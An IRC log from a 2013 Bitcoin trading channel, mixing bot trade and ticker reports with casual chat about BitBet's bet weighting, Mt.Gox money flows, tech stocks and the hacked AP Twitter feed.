[BTCTC] [COGNITIVE] 8 @ 0.1982 = 1.5856 BTC [+] Apr 23 04:36:54 then compute the current payout percentages on both side, or somthing - I really think that it would help Apr 23 04:38:22 in getting more people to bet - I think that the complexity is a barrier to new users... Apr 23 04:39:00 ;;stats Apr 23 04:39:01 I have 18 registered users with 23 registered hostmasks; 1 owner and 0 admins. Apr 23 04:39:36 ;;bc,stats Apr 23 04:39:46 ;;bc,stats Apr 23 04:39:49 Current Blocks: 232668 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 1187 blocks | Next Difficulty In About: 1 week, 0 days, 19 hours, 25 minutes, and 15 seconds | Next Difficulty Estimate: 9648500.29011 | Estimated Percent Change: 7.51261 Apr 23 04:42:11 [HAVELOCK] [VTX] 1 @ 0.45 BTC [+] Apr 23 04:42:12 [HAVELOCK] [VTX] 5 @ 0.44999998 = 2.25 BTC [-] Apr 23 04:53:16 http://bitbet.us/bet/403/bitcoin-at-420-on-or-before-4-20/ Apr 23 04:53:21 the comments on this bet are so fucking funny. Apr 23 04:59:10 [HAVELOCK] [HIM] 1 @ 1.82 BTC [+] Apr 23 04:59:17 hehe Apr 23 04:59:31 im suprised by the lack of trolls and spam Apr 23 04:59:43 ya, 100% millitant nonsense so far. Apr 23 04:59:49 that static captcha test must have worked Apr 23 05:00:42 i mean there is no "PENIS" and "VAGINA" to be seen Apr 23 05:00:45 which is nice Apr 23 05:01:05 (i was kinda expecting that) Apr 23 05:07:27 PENISVAGINA Apr 23 05:24:26 Grasshopper…. Apr 23 05:24:27 http://www.youtube.com/watch?v=NoxiK7K28PU&feature=youtu.be Apr 23 05:26:03 asphixywanker Apr 23 05:26:41 can't make the damn this play Apr 23 05:32:06 http://trilema.com/2013/bitbet-is-quite-the-lulzmine/ Apr 23 05:37:45 what the actual fuck Apr 23 05:37:53 cannot be this stupid Apr 23 05:37:58 yes. Apr 23 05:38:01 yes can. Apr 23 05:38:05 this is youtube comment level stupid Apr 23 05:38:12 only 70% Apr 23 05:38:19 cry the beloved bitcoin Apr 23 05:40:07 Μῆνιν ἄειδε, θεὰ, Πηληϊάδεω Ἀχιλῆος Apr 23 05:40:20 oh look, runes Apr 23 05:40:41 lol Apr 23 05:40:50 well, i could do MCIX - cos(1) Apr 23 05:41:06 eh cos 0 Apr 23 05:41:25 thea is, of course, goddess Apr 23 05:42:36 aeide would be some sort of praise, tell the story of, Apr 23 05:42:43 canonically translated as "sing" in thsi context. Apr 23 05:42:56 which is, of course, "sing o goddess the anger of achilles" Apr 23 05:43:10 [HAVELOCK] [KCIM] 7 @ 1.4213 = 9.9491 BTC [+] Apr 23 05:46:10 [HAVELOCK] [VTX] 20 @ 0.46999998 = 9.4 BTC [+] **** BEGIN LOGGING AT Tue Apr 23 11:31:39 2013 Apr 23 11:32:06 ;;ticker Apr 23 11:32:07 BTCUSD ticker | Best bid: 127.50000, Best ask: 127.70000, Bid-ask spread: 0.20000, Last trade: 127.50000, 24 hour volume: 63794.59686465, 24 hour low: 120.00000, 24 hour high: 129.20000, 24 hour vwap: 125.07695 Apr 23 11:38:42 ;;bids 0 Apr 23 11:38:45 There are currently 32795971 bitcoins demanded at or over 0.0 USD, worth 22394946.7165 USD in total. | Data vintage: 0.0123 seconds Apr 23 11:57:04 [MPEX] [S.MPOE] 4962 @ 0.00070888 = 3.5175 BTC [+] Apr 23 11:57:08 [MPEX] [S.MPOE] 11148 @ 0.00071245 = 7.9424 BTC [+] Apr 23 11:57:09 [MPEX] [S.MPOE] 12150 @ 0.000709 = 8.6144 BTC [-] Apr 23 11:57:11 [MPEX] [S.MPOE] 6890 @ 0.00072 = 4.9608 BTC [+] Apr 23 12:25:07 [MPEX] [S.MPOE] 16300 @ 0.00072 = 11.736 BTC [+] Apr 23 12:27:46 [MPEX] [S.MPOE] 1810 @ 0.00072 = 1.3032 BTC [+] Apr 23 12:27:49 [MPEX] [S.MPOE] 8190 @ 0.00073 = 5.9787 BTC [+] Apr 23 12:39:00 mircea_popescu: I assume weight decay is linear on BitBet. Do you have any reason that's the most optimal curve to encourage early bets? Personally, I doubt it. Apr 23 12:39:04 [BTCTC] [ASICMINER-PT] 1 @ 1.14001 BTC [+] Apr 23 12:39:42 any reason to believe Apr 23 12:39:44 zebedee_ i doubt it too. the original plan was to allow curve definition at bet introduction Apr 23 12:40:04 however we couldn't find a way that was both intuitive for non-math people to specify and practicable in a web interface. Apr 23 12:40:10 Something like e^-x is probably more appropriate. Apr 23 12:40:11 Yeah Apr 23 12:40:21 can you prove e^-x is better ? Apr 23 12:40:32 [BTCTC] [ASICMINER-PT] 2 @ 1.14 = 2.28 BTC [-] Apr 23 12:40:33 can you prove there exists some manner to select the better curve ? Apr 23 12:40:39 It just weights earlier bets more than linearly. Just a guess. Apr 23 12:40:51 people kinda complain about too much weight for early bets tho Apr 23 12:41:15 Those that weight until the last moment to bet HUGE on a near-certain outcome? We can ignore them. Apr 23 12:41:17 Perhaps. Apr 23 12:41:18 don't get me wroing, the question ios a very good one Apr 23 12:41:29 s/wait/weight/ sigh. Apr 23 12:41:34 just, it needs some serious address. Apr 23 12:41:53 if you review closed bets, the system as it is works superbly to discourage the tail betting. Apr 23 12:41:56 Agreed. Room for innovation! BoB is linear too I think. Apr 23 12:43:10 I like my bets to have at least 1 week of no-betting time before determination, to force people to at least be taking some risk when betting. Just my preference. Apr 23 12:43:28 1 day doesn't seem to cut it. Apr 23 12:48:30 well depends on the bet. bitbet has a 7 to 3 day interval settable iirc Apr 23 12:48:42 if the bet is "stock will be over x on y day" then y-3 works juyst fine i guess Apr 23 13:02:00 [BTCTC] [ASICMINER-PT] 1 @ 1.18889 BTC [+] Apr 23 13:02:47 [BTCTC] [ASICMINER-PT] 1 @ 1.1889 BTC [+] Apr 23 13:03:16 [BTCTC] [ASICMINER-PT] 1 @ 1.189 BTC [+] Apr 23 13:03:18 [BTCTC] [ASICMINER-PT] 1 @ 1.189 BTC [+] Apr 23 13:05:15 [BTCTC] [ASICMINER-PT] 5 @ 1.19 = 5.95 BTC [+] Apr 23 13:09:11 [BTCTC] [ASICMINER-PT] 5 @ 1.19 = 5.95 BTC [+] Apr 23 13:30:52 right, if pool is closed 3-7 days before determing factor, there is less of a need to decay to 1 Apr 23 13:39:16 [05:42] aeide would be some sort of praise, tell the story of, Apr 23 13:39:21 always translates to sing Apr 23 13:39:32 if you shuffle a letter around it translates to vagina Apr 23 13:44:12 [MPEX] [S.MPOE] 2800 @ 0.00072802 = 2.0385 BTC [-] Apr 23 13:44:14 [MPEX] [S.MPOE] 9000 @ 0.00071866 = 6.4679 BTC [-] Apr 23 13:44:16 [MPEX] [S.MPOE] 4000 @ 0.00071119 = 2.8448 BTC [-] Apr 23 13:59:03 [BTCTC] [ASICMINER-PT] 1 @ 1.15001 BTC [-] Apr 23 13:59:12 [BTCTC] [ASICMINER-PT] 9 @ 1.15 = 10.35 BTC [-] Apr 23 14:14:03 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [+] Apr 23 14:15:22 [BTCTC] [ASICMINER-PT] 3 @ 1.2 = 3.6 BTC [+] Apr 23 14:23:03 [HAVELOCK] [SDICE] 20 @ 0.3 = 6 BTC [-] Apr 23 14:32:34 [MPEX] [S.MPOE] 8700 @ 0.00072095 = 6.2723 BTC [+] Apr 23 14:32:39 [MPEX] [S.MPOE] 5800 @ 0.00073 = 4.234 BTC [+] Apr 23 14:38:49 [MPEX] [S.DICE] 900 @ 0.00265301 = 2.3877 BTC [-] Apr 23 14:55:19 ;;asks 119 Apr 23 14:55:21 There are currently 0 bitcoins offered at or under 119.0 USD, worth 0.0 USD in total. | Data vintage: 0.0026 seconds Apr 23 14:55:27 ;;bids 119 Apr 23 14:55:27 There are currently 25036.97 bitcoins demanded at or over 119.0 USD, worth 3063571.35549 USD in total. | Data vintage: 6.0331 seconds Apr 23 14:55:42 that is a large number 25 just to 119 that is bullish Apr 23 14:55:46 ;;bids 0 Apr 23 14:55:46 There are currently 29831987 bitcoins demanded at or over 0.0 USD, worth 22847009.5336 USD in total. | Data vintage: 25.1612 seconds Apr 23 14:55:55 22 million nice Apr 23 14:56:39 ;;bids 100 Apr 23 14:56:40 There are currently 57573.842 bitcoins demanded at or over 100.0 USD, worth 6586580.08243 USD in total. | Data vintage: 78.7672 seconds Apr 23 14:56:45 nice Apr 23 15:10:40 [BTCTC] [S.MPOE-PT] 500 @ 0.000694 = 0.347 BTC [+] Apr 23 15:11:19 [MPEX] [S.MPOE] 500 @ 0.00071953 = 0.3598 BTC [-] Apr 23 15:12:10 There are currently 201161.83 bitcoins demanded at or over 50.0 USD, worth 16241019.1092 USD in total. | Data vintage: 0.0091 seconds Apr 23 15:12:17 There are currently 29831814 bitcoins demanded at or over 0.0 USD, worth 22839304.496 USD in total. | Data vintage: 7.3404 seconds Apr 23 15:12:26 There are currently 91014.313 bitcoins offered at or under 250.0 USD, worth 16165486.0703 USD in total. | Data vintage: 16.1350 seconds Apr 23 15:12:37 There are currently 65988.188 bitcoins offered at or under 200.0 USD, worth 10221023.1214 USD in total. | Data vintage: 26.7091 seconds Apr 23 15:13:49 There are currently 57540.927 bitcoins demanded at or over 100.0 USD, worth 6581906.95486 USD in total. | Data vintage: 98.5067 seconds Apr 23 15:21:37 [BTCTC] [GSDPT] 1 @ 0.00355 BTC [-] Apr 23 15:26:50 lol, zhou tong is back Apr 23 15:28:08 Did I hear this right? Apr 23 15:28:12 http://www.reuters.com/video/2013/04/23/an-exclusive-peek-into-the-worlds-bigges?videoId=242413486&videoChannel=5 $5-20MM flowing into gox per day, 300,000-1MM flowing out. Apr 23 15:28:25 [BTCTC] [B.YABMC] 100 @ 0.016 = 1.6 BTC [+] Apr 23 15:28:31 I can't tell if he said 500,000 or 5M as the minimum amount per day flowing in Apr 23 15:33:15 he has such a think accent Apr 23 15:33:18 where is he from? Apr 23 15:34:18 sounds swiss Apr 23 15:34:47 i did not expect that voice to come out of that face Apr 23 15:35:07 lol Apr 23 15:35:26 bug you heard right Apr 23 15:35:34 as far as i can hear Apr 23 15:35:56 yeah, I think that was "five and..... 20 million dollars" Apr 23 15:37:48 i thought he said 20 million coming in 300k to 1 million going out Apr 23 15:38:55 then he said, a lot more coming in than going out Apr 23 15:39:30 pizzaman1337: france Apr 23 15:40:13 oh, interesting Apr 23 15:41:10 130 is going down soon Apr 23 15:41:59 http://www.youtube.com/watch?feature=player_embedded&v=NoxiK7K28PU Apr 23 15:42:05 give spacex ipo Apr 23 15:42:06 http://youtu.be/Vzge_rRdXHQ Apr 23 15:42:20 The Secret World Of Gold Full & Complete Program Apr 23 15:42:48 ;;ticker Apr 23 15:42:49 BTCUSD ticker | Best bid: 128.57901, Best ask: 128.58000, Bid-ask spread: 0.00099, Last trade: 128.58000, 24 hour volume: 60109.66578235, 24 hour low: 120.05001, 24 hour high: 129.20000, 24 hour vwap: 125.76562 Apr 23 15:45:12 yeah that grasshopper test is amazing Apr 23 15:45:26 full demo is scheduled by the end of this year Apr 23 15:45:38 IPO is in another 1-2yr Apr 23 15:45:56 lol Apr 23 15:46:00 like TSLA? Apr 23 15:46:34 yet Apr 23 15:46:37 the stock is up Apr 23 15:46:48 trollolol Apr 23 15:46:57 stick to the toilet paper investments Apr 23 15:49:05 erik schmidt just talked about bitcoins on cnbc Apr 23 15:49:14 yes, because noone else launches satellites Apr 23 15:50:35 as for tesla, we are exactly at the point where big battery packs are viable for cars Apr 23 15:50:42 [BTCTC] [BASIC-MINING] 1 @ 0.42 BTC [+] Apr 23 15:50:43 and their energy density doubles every 4-5 years Apr 23 15:50:45 [BTCTC] [BASIC-MINING] 1 @ 0.4101 BTC [-] Apr 23 15:51:42 model X will be out soon, and then an even cheaper model is in the works Apr 23 15:52:05 Upgrading gigamining to teramining: is it worth it? Apr 23 15:52:24 $5-20MM flowing into gox per day, 300,000-1MM flowing out... so the fiat evaporates there? Apr 23 15:52:44 or are gox acct balances inreasing by few mm every day? Apr 23 15:52:46 not a single computer manufacturer has a successful tablet that consumers want in their hands Apr 23 15:52:48 see what i did there? Apr 23 15:53:11 [MPEX] [S.MPOE] 6200 @ 0.00072114 = 4.4711 BTC [+] Apr 23 15:53:15 [MPEX] [S.MPOE] 2700 @ 0.00073 = 1.971 BTC [+] Apr 23 15:53:32 they are paying it off just fine Apr 23 15:54:55 how the fuck is is a waste, they are paying off the loan Apr 23 15:55:27 is Scrat an uninitiated tiberius victim? Apr 23 15:55:42 lol Apr 23 15:56:09 productive businesses (GM) Apr 23 15:56:22 does the Note 2 count as a tablet? I kinda want one now that my wife has one Apr 23 15:56:52 ThickAsThieves: im fully aware that I'm feeding the troll Apr 23 15:56:57 kk Apr 23 15:57:38 poor Scrat Apr 23 15:57:46 has he called you poor yet? Apr 23 15:58:31 jurov: i think its turned into bitcoins, and people are leaving their cash there Apr 23 15:58:34 not withdrawing it yet Apr 23 16:01:18 tiberiusiv is a made up character Apr 23 16:01:31 an elaborate markov chain bot being fed data from /b/ Apr 23 16:01:32 no, it's a battle bot Apr 23 16:01:44 tiberiusiv: fam already has spaceX options Apr 23 16:02:34 MJR_: or mtgox prevents them withdrawing it Apr 23 16:10:51 130 Apr 23 16:11:24 crazy buying Apr 23 16:12:29 aaand the wall is gone ^^ Apr 23 16:13:07 ;;calc 5000000/120 Apr 23 16:13:08 41666.6666667 Apr 23 16:13:45 5m fiat surplus flowing into gox means over 40k bitcoins sold every day Apr 23 16:13:51 i call bs on that Apr 23 16:14:10 ;;ticker Apr 23 16:14:12 BTCUSD ticker | Best bid: 132.00001, Best ask: 132.33000, Bid-ask spread: 0.32999, Last trade: 132.33000, 24 hour volume: 68849.89326207, 24 hour low: 120.10010, 24 hour high: 132.20000, 24 hour vwap: 126.37223 Apr 23 16:14:14 unless most investors are waiting Apr 23 16:14:24 and that's not believeable either Apr 23 16:23:42 [MPEX] [S.MPOE] 1290 @ 0.00073 = 0.9417 BTC [+] Apr 23 16:23:47 [MPEX] [S.MPOE] 3700 @ 0.00073157 = 2.7068 BTC [+] Apr 23 16:25:08 ;;bids 0 Apr 23 16:25:09 There are currently 29923419 bitcoins demanded at or over 0.0 USD, worth 23113384.2464 USD in total. | Data vintage: 52.5510 seconds Apr 23 16:26:48 still building Apr 23 16:26:56 all that buying was new bids Apr 23 16:31:30 anyone else having problems with blockchain.info holding transactions? Apr 23 16:31:30 anyone else having problems with blockchain.info holding transactions? Apr 23 16:31:31 anyone else having problems with blockchain.info holding transactions? Apr 23 16:31:31 anyone else having problems with blockchain.info holding transactions? Apr 23 16:31:31 anyone else having problems with blockchain.info holding transactions? Apr 23 16:31:31 anyone else having problems with blockchain.info holding transactions? Apr 23 16:31:54 pwnt Apr 23 16:33:03 anyone else having problems with blockchain.info holding transactions? Apr 23 16:33:03 anyone else having problems with blockchain.info holding transactions? Apr 23 16:33:04 anyone else having problems with blockchain.info holding transactions? Apr 23 16:33:04 anyone else having problems with blockchain.info holding transactions? Apr 23 16:33:05 anyone else having problems with blockchain.info holding transactions? Apr 23 16:33:20 blokchn: fuck your face Apr 23 16:37:57 [MPEX] [S.MPOE] 2110 @ 0.00073762 = 1.5564 BTC [+] Apr 23 16:42:57 ;;goxlag Apr 23 16:42:58 MtGox lag is 1.219795 seconds. During this time, light travels 0.00244445552249 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 23 16:44:03 [HAVELOCK] [SDICE] 25 @ 0.2999 = 7.4975 BTC [-] Apr 23 16:45:02 !l m s.dice Apr 23 16:45:02 [HAVELOCK] [SDICE] 41 @ 0.2991 = 12.2631 BTC [-] Apr 23 16:45:03 Last trade for S.DICE on MPEX was at 0.00265301 BTC [-] Apr 23 16:55:02 There are currently 57757.774 bitcoins offered at or under 200.0 USD, worth 9207135.54396 USD in total. | Data vintage: 0.0051 seconds Apr 23 16:58:03 Upgrading gigamining to teramining: is it worth it? Apr 23 16:59:33 [BTCTC] [ASICMINER-PT] 3 @ 1.2 = 3.6 BTC [+] Apr 23 17:00:25 http://www.cryptopixel.com/ why the hell... Apr 23 17:00:30 [BTCTC] [ASICMINER-PT] 1 @ 1.168 BTC [-] Apr 23 17:01:15 [BTCTC] [ASICMINER-PT] 1 @ 1.16301 BTC [-] Apr 23 17:01:17 [BTCTC] [ASICMINER-PT] 1 @ 1.163 BTC [-] Apr 23 17:02:02 [BTCTC] [ASICMINER-PT] 2 @ 1.16 = 2.32 BTC [-] Apr 23 17:04:03 [HAVELOCK] [SDICE] 25 @ 0.295 = 7.375 BTC [-] Apr 23 17:04:38 [MPEX] [S.MPOE] 9503 @ 0.00071953 = 6.8377 BTC [-] Apr 23 17:17:22 [MPEX] [S.MPOE] 6240 @ 0.00072327 = 4.5132 BTC [+] Apr 23 17:17:23 [MPEX] [S.MPOE] 3910 @ 0.00073 = 2.8543 BTC [+] Apr 23 17:24:43 bitcoin is old news now http://www.theverge.com/2013/4/23/4252808/can-zerocoin-and-ripple-build-a-better-bitcoin Apr 23 17:36:10 who cares about ripple? Apr 23 17:36:11 ugh Apr 23 17:41:45 Isn't ripple sort of a distributed exchange? Apr 23 17:47:30 ripple is supposed to be used to buy/sell personal credit Apr 23 17:50:17 and its creators are trying to make sure it doesn't stray from their plans by holding huge stash Apr 23 17:50:43 that's all i know Apr 23 17:56:33 There are currently 0 bitcoins offered at or under 50.0 USD, worth 0.0 USD in total. | Data vintage: 77.6769 seconds Apr 23 17:56:42 There are currently 200891.07 bitcoins demanded at or over 50.0 USD, worth 16807697.8497 USD in total. | Data vintage: 85.5081 seconds Apr 23 17:58:31 There are currently 65975.845 bitcoins demanded at or over 100.0 USD, worth 7804157.02725 USD in total. | Data vintage: 0.0080 seconds Apr 23 17:58:38 There are currently 55664.129 bitcoins offered at or under 200.0 USD, worth 8974006.92163 USD in total. | Data vintage: 6.4764 seconds Apr 23 18:02:03 [HAVELOCK] [SDICE] 18 @ 0.299 = 5.382 BTC [+] Apr 23 18:04:24 ;;ticker Apr 23 18:04:25 BTCUSD ticker | Best bid: 136.45000, Best ask: 136.80000, Bid-ask spread: 0.35000, Last trade: 136.80000, 24 hour volume: 84182.26967231, 24 hour low: 120.33333, 24 hour high: 137.68860, 24 hour vwap: 128.36205 Apr 23 18:04:34 gimme back 120 Apr 23 18:11:54 [MPEX] [S.MPOE] 6150 @ 0.00069882 = 4.2977 BTC [-] Apr 23 18:13:03 [HAVELOCK] [VTX] 1 @ 0.4969 BTC [+] Apr 23 18:15:04 [HAVELOCK] [SDICE] 5 @ 0.29899999 = 1.495 BTC [-] Apr 23 18:16:01 [MPEX] [S.DICE] 500 @ 0.00293321 = 1.4666 BTC [+] Apr 23 18:18:08 you here bugpowder? Apr 23 18:18:39 yah Apr 23 18:40:32 http://www.paymentssource.com/news/isos-that-work-with-marijuana-dispensaries-risk-getting-burned-3013891-1.html Apr 23 18:44:39 ;;bids 0 Apr 23 18:44:40 There are currently 30778230 bitcoins demanded at or over 0.0 USD, worth 23022552.3573 USD in total. | Data vintage: 12.3272 seconds Apr 23 18:45:36 I know I've made bets on bitbet. I'd like to know which ones though. I've forgotten! Apr 23 18:45:49 Is there a way to search for a wallet ID to know what bets the wallet is involved with? Apr 23 18:45:52 you can search by address Apr 23 18:46:08 ;;ticker Apr 23 18:46:09 BTCUSD ticker | Best bid: 135.18809, Best ask: 135.45886, Bid-ask spread: 0.27077, Last trade: 135.00000, 24 hour volume: 88119.49556709, 24 hour low: 121.70000, 24 hour high: 137.68860, 24 hour vwap: 128.92758 Apr 23 18:46:38 cool, probably should have tried before asking. thanks Apr 23 18:47:05 you should be able to see preset "keyword, address" in the search field Apr 23 18:47:49 http://shrani.si/f/1P/Iz/36fP5LiD/search.png Apr 23 18:48:10 you can combine Apr 23 18:48:18 both Apr 23 18:48:35 like "1something BFL" Apr 23 18:56:19 one of these new sorely needed btc services: http://thefuckingbitcoin.com/ Apr 23 19:00:29 [BTCTC] [ASICMINER-PT] 1 @ 1.15021 BTC [-] Apr 23 19:00:35 "Data via Mt.Gox Streaming API / Reverse forecast averages pulled out of my ass" Apr 23 19:00:42 heh Apr 23 19:03:36 can is alive:) Apr 23 19:03:36 chan Apr 23 19:05:22 yea, nobody was killed in romania Apr 23 19:05:33 or kidnapped Apr 23 19:12:34 hopefully you had some fun too? Apr 23 19:15:33 ofc we had Apr 23 19:16:15 plus i had some unplanned excursion after boarding wrong train Apr 23 19:16:48 [BTCTC] [B.YABMC] 65 @ 0.016499 = 1.0724 BTC [+] Apr 23 19:17:35 [BTCTC] [B.YABMC] 100 @ 0.0165 = 1.65 BTC [+] Apr 23 19:17:50 omg jurov what happend with the train Apr 23 19:19:56 the budapest-bucharest trains in both directions met in timisoara with departures 5 minutes apart Apr 23 19:20:11 [BTCTC] [B.YABMC] 50 @ 0.017 = 0.85 BTC [+] Apr 23 19:21:11 and the table was easy to misread (arrivals/departures labeled only in romanian) Apr 23 19:21:18 so me and an older hungarian lady got into wrong one Apr 23 19:22:05 and went off next stop, she knew romanian so not a big problem Apr 23 19:22:22 just had to wait 2 hrs and get back... Apr 23 19:23:00 then i found by chance a nice hostel in timisoara, a family house complete with dogs and cat Apr 23 19:23:36 ideal to calm my nerves :) Apr 23 19:24:08 :D Apr 23 19:24:20 well at least it worked out ok in the end Apr 23 19:24:28 only that the cat preferred to lay on my notebook's psu instead of near me. such a bitch Apr 23 19:25:49 :) Apr 23 19:25:58 [MPEX] [S.MPOE] 11573 @ 0.00069882 = 8.0874 BTC [-] Apr 23 19:26:03 [MPEX] [S.MPOE] 4777 @ 0.00068337 = 3.2645 BTC [-] Apr 23 19:26:45 oh and the mobile internet (alhough slow) never dropped even in middle of nowhere. amazing. Apr 23 19:30:52 [MPEX] [S.MPOE] 1700 @ 0.00069956 = 1.1893 BTC [+] Apr 23 19:30:54 [MPEX] [S.MPOE] 13842 @ 0.00070646 = 9.7788 BTC [+] Apr 23 19:34:51 hey guys, what are the most interesting ventures in bitcoin world, i have browsed a bit on bitcoin stocks but most seem blatantly overvalued on marketcap. Apr 23 19:36:38 this channel Apr 23 19:36:48 ? Apr 23 19:38:49 Asicminer Apr 23 19:39:18 Satoshi Dice Apr 23 19:39:41 Mpex Apr 23 19:40:15 BitBet Apr 23 19:50:09 satoshi has a marcet cap of 7'K as i calculated, gotta check the books tough Apr 23 19:50:19 700k Apr 23 19:50:59 more to come! Apr 23 19:51:00 [MPEX] [S.MPOE] 6255 @ 0.00071222 = 4.4549 BTC [+] Apr 23 19:51:01 [MPEX] [S.MPOE] 2595 @ 0.00071733 = 1.8615 BTC [+] Apr 23 19:59:45 [MPEX] [S.MPOE] 800 @ 0.00071733 = 0.5739 BTC [+] Apr 23 20:05:03 [HAVELOCK] [KCIM] 20 @ 1.33 = 26.6 BTC [-] Apr 23 20:07:42 [BTCTC] [S.MPOE-PT] 720 @ 0.000695 = 0.5004 BTC [+] Apr 23 20:08:08 ls Apr 23 20:08:46 [BTCTC] [RSM] 50 @ 0.0055 = 0.275 BTC [+] Apr 23 20:09:03 [HAVELOCK] [HIM] 1 @ 1.821 BTC [+] Apr 23 20:09:09 lol Apr 23 20:10:05 !ticker Apr 23 20:10:07 It says some pelt-wearin' trapper, some stinkin' bean-suckin' possum skinner, he's gonna collect that reward money. Apr 23 20:10:12 !ticker m s.mpoe Apr 23 20:10:14 [MPEX:S.MPOE] 1D: 0.00067618 / 0.0006985 / 0.00073762 (402728 shares, 281.31 BTC), 7D: 0.00067618 / 0.00070449 / 0.00073891 (2496216 shares, 1,758.57 BTC), 30D: 0.00059218 / 0.00068429 / 0.00073891 (10074634 shares, 6,894.07 BTC) Apr 23 20:10:22 !ticker m ^oix Apr 23 20:10:24 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 23 20:10:30 LOL Apr 23 20:10:48 [BTCTC] [GSDPT] 24 @ 0.00355 = 0.0852 BTC [-] Apr 23 20:10:57 [BTCTC] [GSDPT] 26 @ 0.00379 = 0.0985 BTC [+] Apr 23 20:15:05 [BTCTC] [BASIC-MINING] 1 @ 0.437 BTC [+] Apr 23 20:17:56 [MPEX] [S.MPOE] 17343 @ 0.00070979 = 12.3099 BTC [-] Apr 23 20:19:34 lol Apr 23 20:19:46 ap twitter feed was hacked Apr 23 20:19:47 lol Apr 23 20:21:49 that was crazy Apr 23 20:22:14 they tweeted that there were two explosions in the white house and obama was injured Apr 23 20:22:23 dow fell like 150 points before snapping back Apr 23 20:23:53 lol wtf Apr 23 20:23:56 for real? Apr 23 20:23:58 wow Apr 23 20:26:07 yea, thats what CNBC says: http://www.cnbc.com/id/100664423 Apr 23 20:26:34 good old tightly coupled systems Apr 23 20:26:53 good old traders, looking for the info-edge Apr 23 20:29:09 here's the beat down in a chart: https://www.google.com/finance?q=INDEXDJX%3A.DJI%2CINDEXSP%3A.INX%2CINDEXNASDAQ%3A.IXIC&ei=DcR2UcjbLYWOqgHYUg&hl=en Apr 23 20:32:21 [MPEX] [S.MPOE] 823 @ 0.00068337 = 0.5624 BTC [-] Apr 23 20:32:23 [MPEX] [S.MPOE] 14226 @ 0.00068284 = 9.7141 BTC [-] Apr 23 20:32:26 [MPEX] [S.MPOE] 1766 @ 0.00067862 = 1.1984 BTC [-] Apr 23 20:34:37 lol Apr 23 20:39:30 was crazy moves Apr 23 20:39:45 http://www.nanex.net/aqck2/4176.html << ZAP Apr 23 20:45:32 [BTCTC] [ASICMINER-PT] 1 @ 1.199 BTC [+] Apr 23 20:56:31 [BTCTC] [COGNITIVE] 2 @ 0.1982 = 0.3964 BTC [+] Apr 23 21:00:17 ;;nethash Apr 23 21:00:17 73851.0847314 Apr 23 21:00:23 nice Apr 23 21:01:11 ;;bc,stats Apr 23 21:01:13 Current Blocks: 232776 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 1079 blocks | Next Difficulty In About: 6 days, 14 hours, 52 minutes, and 16 seconds | Next Difficulty Estimate: 9669629.13619 | Estimated Percent Change: 7.74805 Apr 23 21:02:24 [BTCTC] [PAJKA.BOND] 4 @ 0.0975 = 0.39 BTC [+] Apr 23 21:11:27 [BTCTC] [S.MPOE-PT] 2 @ 0.000631 = 0.0013 BTC [-] Apr 23 21:11:32 [MPEX] [S.MPOE] 3407 @ 0.00067862 = 2.3121 BTC [-] Apr 23 21:11:34 [MPEX] [S.MPOE] 1593 @ 0.00067861 = 1.081 BTC [-] Apr 23 21:14:27 [BTCTC] [ASICMINER-PT] 1 @ 1.1603 BTC [-] Apr 23 21:21:54 [BTCTC] [ASICMINER-PT] 1 @ 1.157 BTC [-] Apr 23 21:22:04 [BTCTC] [ASICMINER-PT] 1 @ 1.150221 BTC [-] Apr 23 21:22:33 [BTCTC] [ASICMINER-PT] 1 @ 1.15022 BTC [-] Apr 23 21:22:42 [BTCTC] [ASICMINER-PT] 1 @ 1.1502 BTC [-] Apr 23 21:22:46 [BTCTC] [ASICMINER-PT] 1 @ 1.15001 BTC [-] Apr 23 21:23:48 [BTCTC] [ASICMINER-PT] 3 @ 1.15001 = 3.45 BTC [-] Apr 23 21:23:58 [BTCTC] [ASICMINER-PT] 1 @ 1.15001 BTC [-] Apr 23 21:25:30 [BTCTC] [ASICMINER-PT] 4 @ 1.14101 = 4.564 BTC [-] Apr 23 21:28:58 [MPEX] [S.MPOE] 3700 @ 0.00068496 = 2.5344 BTC [+] Apr 23 21:30:45 [BTCTC] [BASIC-MINING] 5 @ 0.43701 = 2.1851 BTC [+] Apr 23 21:31:24 [BTCTC] [BASIC-MINING] 2 @ 0.437 = 0.874 BTC [-] Apr 23 21:32:54 ;;next Apr 23 21:32:55 \*AWAY UNTIL April 28\* resistance: 132, 136, 138-140 | support: 120, 115, 110, 100, 90 | lower buy targets: 102, 96-100, 86 | updated by OneFixt at Apr 21 2013, 18:00 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 2 days, 0 hours, 32 minutes, and 52 seconds ago Apr 23 21:32:57 [BTCTC] [COGNITIVE] 1 @ 0.19 BTC [-] Apr 23 21:34:33 [BTCTC] [RSM] 36 @ 0.0055 = 0.198 BTC [+] Apr 23 21:35:43 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Apr 23 21:37:38 [BTCTC] [ASICMINER-PT] 1 @ 1.15022 BTC [+] Apr 23 21:38:00 [BTCTC] [ASICMINER-PT] 1 @ 1.150221 BTC [+] Apr 23 21:48:03 [HAVELOCK] [SDICE] 5 @ 0.291 = 1.455 BTC [-] Apr 23 21:51:25 [MPEX] [S.MPOE] 770 @ 0.00070085 = 0.5397 BTC [+] Apr 23 21:55:17 [MPEX] [S.BBET] 450 @ 0.0014 = 0.63 BTC [-] Apr 23 21:55:19 [MPEX] [S.BBET] 550 @ 0.0014 = 0.77 BTC [-] Apr 23 21:57:10 [BTCTC] [COGNITIVE] 3 @ 0.1982 = 0.5946 BTC [+] Apr 23 21:57:58 [BTCTC] [PAJKA.BOND] 1 @ 0.0975 BTC [+] Apr 23 22:01:30 [BTCTC] [B.YABMC] 1 @ 0.017 BTC [+] Apr 23 22:03:50 [BTCTC] [RSM] 1 @ 0.0055 BTC [+] Apr 23 22:05:16 [BTCTC] [ASICMINER-PT] 9 @ 1.2 = 10.8 BTC [+] Apr 23 22:23:41 [MPEX] [S.MPOE] 11700 @ 0.00070052 = 8.1961 BTC [-] Apr 23 22:30:03 [HAVELOCK] [HIM] 1 @ 1.86 BTC [+] Apr 23 22:59:18 [BTCTC] [ASICMINER-PT] 1 @ 1.142 BTC [-] Apr 23 23:00:39 [BTCTC] 